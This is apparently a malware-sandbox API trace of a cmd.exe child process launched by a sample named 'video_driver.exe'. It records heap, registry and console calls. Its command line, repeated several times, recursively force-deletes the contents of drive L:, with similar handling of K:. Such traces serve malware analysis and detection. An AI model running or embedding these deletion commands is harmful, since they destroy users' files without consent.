RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x4433d0, Size=0x12) returned 0x4433d0 [0063.500] GetProcessHeap () returned 0x430000 [0063.500] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x4433d0) returned 0x12 [0063.501] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0063.501] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0063.501] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0063.501] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0063.501] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0063.501] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0063.502] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0063.503] GetProcessHeap () returned 0x430000 [0063.503] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x4433f0 [0063.504] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0063.505] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0063.505] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0063.505] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0063.505] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0063.505] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0063.505] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0063.505] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0063.505] GetProcessHeap () returned 0x430000 [0063.505] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443410 [0063.505] GetProcessHeap () returned 0x430000 [0063.505] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x14) returned 0x443470 [0063.506] GetProcessHeap () returned 0x430000 [0063.506] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x20) returned 0x4457e0 [0063.508] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0063.511] GetFullPathNameW (in: lpFileName="K:", nBufferLength=0x208, lpBuffer=0x28f550, lpFilePart=0x28f2fc | out: lpBuffer="K:\\", lpFilePart=0x28f2fc*=0x0) returned 0x3 [0063.512] wcsncmp (_String1="K:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -17 [0063.517] GetFileAttributesW (lpFileName="K:\\" (normalized: "k:")) returned 0xffffffff [0063.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.518] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0063.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.519] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0063.519] _get_osfhandle (_FileHandle=0) returned 0x3 [0063.519] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0063.520] SetConsoleInputExeNameW () returned 0x1 [0063.520] GetConsoleOutputCP () returned 0x1b5 [0063.520] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0063.520] SetThreadUILanguage (LangId=0x0) returned 0x409 [0063.521] exit (_Code=0) Process: id = "32" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42cff000" os_pid = "0x35c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"L:\" del /f /s /q \"L:\" & FOR /D %p IN (\"L:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 60 os_tid = 0x598 [0063.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af854 | out: lpSystemTimeAsFileTime=0x1af854*(dwLowDateTime=0x3e53fe0, dwHighDateTime=0x1d62400)) [0063.878] GetCurrentProcessId () returned 0x35c [0063.878] GetCurrentThreadId () returned 0x598 [0063.878] GetTickCount () returned 0x11476b6 [0063.878] QueryPerformanceCounter (in: lpPerformanceCount=0x1af84c | out: lpPerformanceCount=0x1af84c*=18401184203) returned 1 [0063.880] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0063.880] __set_app_type (_Type=0x1) [0063.880] __p__fmode () returned 0x770331f4 [0063.880] __p__commode () returned 0x770331fc [0063.881] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0063.881] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0063.881] GetCurrentThreadId () returned 0x598 [0063.881] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x598) returned 0x60 [0063.881] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0063.881] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0063.881] SetThreadUILanguage (LangId=0x0) returned 0x409 [0063.882] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0063.882] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af7e4 | out: phkResult=0x1af7e4*=0x0) returned 0x2 [0063.882] VirtualQuery (in: lpAddress=0x1af81b, lpBuffer=0x1af7b4, dwLength=0x1c | out: lpBuffer=0x1af7b4*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0063.882] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af7b4, dwLength=0x1c | out: lpBuffer=0x1af7b4*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0063.882] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af7b4, dwLength=0x1c | out: lpBuffer=0x1af7b4*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0063.882] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1af7b4, dwLength=0x1c | out: lpBuffer=0x1af7b4*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0063.882] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af7b4, dwLength=0x1c | out: lpBuffer=0x1af7b4*(BaseAddress=0x1b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x40000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0063.883] GetConsoleOutputCP () returned 0x1b5 [0063.883] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0063.883] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0063.883] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.883] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0063.884] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.884] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0063.884] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.884] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0063.885] _get_osfhandle (_FileHandle=0) returned 0x3 [0063.885] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0063.885] GetEnvironmentStringsW () returned 0x4820f8* [0063.885] GetProcessHeap () returned 0x470000 [0063.885] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xaca) returned 0x482bd0 [0063.885] FreeEnvironmentStringsW (penv=0x4820f8) returned 1 [0063.885] GetProcessHeap () returned 0x470000 [0063.886] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4) returned 0x481898 [0063.886] GetEnvironmentStringsW () returned 0x4820f8* [0063.886] GetProcessHeap () returned 0x470000 [0063.886] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xaca) returned 0x4836a8 [0063.886] FreeEnvironmentStringsW (penv=0x4820f8) returned 1 [0063.886] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae754 | out: phkResult=0x1ae754*=0x68) returned 0x0 [0063.886] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x0, lpData=0x1ae760*=0x0, lpcbData=0x1ae758*=0x1000) returned 0x2 [0063.886] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x4, lpData=0x1ae760*=0x1, lpcbData=0x1ae758*=0x4) returned 0x0 [0063.886] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x0, lpData=0x1ae760*=0x1, lpcbData=0x1ae758*=0x1000) returned 0x2 [0063.887] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x4, lpData=0x1ae760*=0x0, lpcbData=0x1ae758*=0x4) returned 0x0 [0063.887] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x4, lpData=0x1ae760*=0x40, lpcbData=0x1ae758*=0x4) returned 0x0 [0063.887] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x4, lpData=0x1ae760*=0x40, lpcbData=0x1ae758*=0x4) returned 0x0 [0063.887] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x0, lpData=0x1ae760*=0x40, lpcbData=0x1ae758*=0x1000) returned 0x2 [0063.887] RegCloseKey (hKey=0x68) returned 0x0 [0063.887] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae754 | out: phkResult=0x1ae754*=0x68) returned 0x0 [0063.887] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x0, lpData=0x1ae760*=0x40, lpcbData=0x1ae758*=0x1000) returned 0x2 [0063.887] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x4, lpData=0x1ae760*=0x1, lpcbData=0x1ae758*=0x4) returned 0x0 [0063.887] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x0, lpData=0x1ae760*=0x1, lpcbData=0x1ae758*=0x1000) returned 0x2 [0063.888] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x4, lpData=0x1ae760*=0x0, lpcbData=0x1ae758*=0x4) returned 0x0 [0063.888] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x4, lpData=0x1ae760*=0x9, lpcbData=0x1ae758*=0x4) returned 0x0 [0063.888] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x4, lpData=0x1ae760*=0x9, lpcbData=0x1ae758*=0x4) returned 0x0 [0063.888] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae75c, lpData=0x1ae760, lpcbData=0x1ae758*=0x1000 | out: lpType=0x1ae75c*=0x0, lpData=0x1ae760*=0x9, lpcbData=0x1ae758*=0x1000) returned 0x2 [0063.888] RegCloseKey (hKey=0x68) returned 0x0 [0063.888] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b69 [0063.888] srand (_Seed=0x5eb34b69) [0063.888] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"L:\" del /f /s /q \"L:\" & FOR /D %p IN (\"L:\") DO rmdir \"%p\" /s /q" [0063.888] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"L:\" del /f /s /q \"L:\" & FOR /D %p IN (\"L:\") DO rmdir \"%p\" /s /q" [0063.888] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0063.888] GetProcessHeap () returned 0x470000 [0063.888] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x210) returned 0x4820f8 [0063.889] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x482100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0063.889] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0063.889] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0063.889] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0063.889] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0063.889] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0063.889] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0063.889] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0063.889] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0063.889] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0063.889] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0063.889] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0063.889] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0063.889] GetProcessHeap () returned 0x470000 [0063.889] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x482bd0 | out: hHeap=0x470000) returned 1 [0063.889] GetEnvironmentStringsW () returned 0x482310* [0063.889] GetProcessHeap () returned 0x470000 [0063.890] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xae2) returned 0x484c70 [0063.890] FreeEnvironmentStringsW (penv=0x482310) returned 1 [0063.890] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0063.890] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0063.890] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0063.890] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0063.890] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0063.890] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0063.890] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0063.890] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0063.890] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0063.890] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0063.890] GetProcessHeap () returned 0x470000 [0063.890] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x54) returned 0x4817c8 [0063.890] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af520 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0063.890] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1af520, lpFilePart=0x1af51c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1af51c*="Desktop") returned 0x25 [0063.890] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0063.891] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af29c | out: lpFindFileData=0x1af29c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x485760 [0063.891] FindClose (in: hFindFile=0x485760 | out: hFindFile=0x485760) returned 1 [0063.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1af29c | out: lpFindFileData=0x1af29c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x485760 [0063.891] FindClose (in: hFindFile=0x485760 | out: hFindFile=0x485760) returned 1 [0063.891] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0063.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1af29c | out: lpFindFileData=0x1af29c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x485760 [0063.891] FindClose (in: hFindFile=0x485760 | out: hFindFile=0x485760) returned 1 [0063.891] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0063.892] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0063.892] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0063.892] GetProcessHeap () returned 0x470000 [0063.892] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x484c70 | out: hHeap=0x470000) returned 1 [0063.892] GetEnvironmentStringsW () returned 0x484180* [0063.892] GetProcessHeap () returned 0x470000 [0063.892] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb36) returned 0x485fa0 [0063.892] FreeEnvironmentStringsW (penv=0x484180) returned 1 [0063.892] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0063.892] GetProcessHeap () returned 0x470000 [0063.892] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4817c8 | out: hHeap=0x470000) returned 1 [0063.892] GetProcessHeap () returned 0x470000 [0063.892] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x400e) returned 0x486ae0 [0063.893] GetProcessHeap () returned 0x470000 [0063.893] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa0) returned 0x482e50 [0063.893] GetProcessHeap () returned 0x470000 [0063.893] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x486ae0 | out: hHeap=0x470000) returned 1 [0063.893] GetConsoleOutputCP () returned 0x1b5 [0063.921] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0063.922] GetUserDefaultLCID () returned 0x409 [0063.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0063.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af660, cchData=128 | out: lpLCData="0") returned 2 [0063.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af660, cchData=128 | out: lpLCData="0") returned 2 [0063.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af660, cchData=128 | out: lpLCData="1") returned 2 [0063.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0063.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0063.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0063.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0063.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0063.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0063.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0063.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0063.924] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0063.924] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0063.924] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0063.926] GetProcessHeap () returned 0x470000 [0063.926] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20c) returned 0x482ef8 [0063.927] GetConsoleTitleW (in: lpConsoleTitle=0x482ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0063.927] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0063.927] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0063.927] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0063.927] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0063.928] GetProcessHeap () returned 0x470000 [0063.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x400a) returned 0x486ae0 [0063.928] GetProcessHeap () returned 0x470000 [0063.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4008) returned 0x48aaf8 [0063.929] GetProcessHeap () returned 0x470000 [0063.929] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1a) returned 0x4857e0 [0063.929] GetEnvironmentVariableW (in: lpName="p IN (\"L", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0063.929] _wcsicmp (_String1="p IN (\"L", _String2="CD") returned 13 [0063.929] _wcsicmp (_String1="p IN (\"L", _String2="ERRORLEVEL") returned 11 [0063.929] _wcsicmp (_String1="p IN (\"L", _String2="CMDEXTVERSION") returned 13 [0063.929] _wcsicmp (_String1="p IN (\"L", _String2="CMDCMDLINE") returned 13 [0063.929] _wcsicmp (_String1="p IN (\"L", _String2="DATE") returned 12 [0063.929] _wcsicmp (_String1="p IN (\"L", _String2="TIME") returned -4 [0063.929] _wcsicmp (_String1="p IN (\"L", _String2="RANDOM") returned -2 [0063.929] _wcsicmp (_String1="p IN (\"L", _String2="HIGHESTNUMANODENUMBER") returned 8 [0063.929] GetProcessHeap () returned 0x470000 [0063.930] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4857e0 | out: hHeap=0x470000) returned 1 [0063.930] GetProcessHeap () returned 0x470000 [0063.930] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48aaf8 | out: hHeap=0x470000) returned 1 [0063.930] GetProcessHeap () returned 0x470000 [0063.930] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4008) returned 0x48aaf8 [0063.930] GetProcessHeap () returned 0x470000 [0063.930] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48aaf8 | out: hHeap=0x470000) returned 1 [0063.930] GetProcessHeap () returned 0x470000 [0063.930] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x486ae0 | out: hHeap=0x470000) returned 1 [0063.931] _wcsicmp (_String1="if", _String2=")") returned 64 [0063.931] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0063.931] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0063.931] _wcsicmp (_String1="IF", _String2="if") returned 0 [0063.931] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0063.931] GetProcessHeap () returned 0x470000 [0063.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x483110 [0063.931] GetProcessHeap () returned 0x470000 [0063.931] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe) returned 0x47ffc0 [0063.932] GetProcessHeap () returned 0x470000 [0063.932] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x20) returned 0x4857e0 [0063.933] GetProcessHeap () returned 0x470000 [0063.933] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4857e0, Size=0x16) returned 0x481800 [0063.933] GetProcessHeap () returned 0x470000 [0063.933] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x481800) returned 0x16 [0063.933] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0063.934] GetProcessHeap () returned 0x470000 [0063.934] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x483170 [0063.934] GetProcessHeap () returned 0x470000 [0063.934] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x4831d0 